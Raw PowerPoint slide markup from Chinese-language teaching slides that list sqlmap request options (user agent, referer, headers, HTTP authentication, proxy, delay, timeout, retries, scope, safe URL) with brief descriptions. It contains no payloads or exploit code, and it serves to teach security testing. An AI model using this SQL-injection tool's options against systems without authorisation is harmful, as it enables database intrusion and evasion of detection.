                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头信息 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600">
              <a:effectLst/>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93590047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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="3640420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--user-agent=AGENT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP User-Agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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random-agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>使用随机选定的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP User-Agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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referer=REFERER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP Referer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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headers=HEADERS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>换⾏分开，加⼊入其他的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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auth-type=ATYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>身份验证类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本，摘要或 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>NTLM)(Basic, Digest or NTLM) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24544831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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="3040256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--auth-cred=ACRED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>身份验证凭据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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auth-cert=ACERT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>认证证书</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>key_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cert_file) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--proxy=PROXY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代理连接到目标 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--proxy-cred=PCRED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代理身份验证凭据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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ignore-proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>忽略系统默认的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代理 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218814209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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4240584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--delay=DELAY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在每个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求之间的延迟时间，单位为秒 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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timeout=TIMEOUT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等待连接超时的时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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retries=RETRIES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>连接超时后重新连接的时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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scope=SCOPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从所提供的代理日志中过滤器目标的正则表达式 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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safe-url=SAFURL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在测试过程中经常访问的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>url </a:t>
